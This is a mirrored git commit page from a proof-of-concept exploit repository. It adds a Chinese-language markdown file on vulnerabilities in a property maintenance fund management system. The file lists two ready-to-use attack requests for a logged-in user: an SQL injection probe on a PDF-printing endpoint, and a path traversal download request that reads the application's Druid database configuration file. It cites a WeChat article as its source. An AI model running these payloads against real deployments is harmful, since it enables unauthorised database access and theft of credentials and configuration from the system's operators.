mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 22:14:52 +08:00
Create 物业专项维修资金管理系统漏洞.md
This commit is contained in:
parent
fe016a9323
commit
bf6231ffca
23
物业专项维修资金管理系统漏洞.md
Normal file
23
物业专项维修资金管理系统漏洞.md
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
## 物业专项维修资金管理系统漏洞
|
||||||
|
利用条件:所有漏洞均需要普通用户权限
|
||||||
|
|
||||||
|
## sql注入漏洞
|
||||||
|
```
|
||||||
|
/property/propertyRightAlteration/printManyPdf?id=1+and+1=1a
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
## 文件读取漏洞
|
||||||
|
```
|
||||||
|
/common/download?fileName=../../wxzj/application-druid.yml
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞来源
|
||||||
|
- https://mp.weixin.qq.com/s/wNCafw5pBGTnUEVUoDjbtg
|
||||||
Loading…
x
Reference in New Issue
Block a user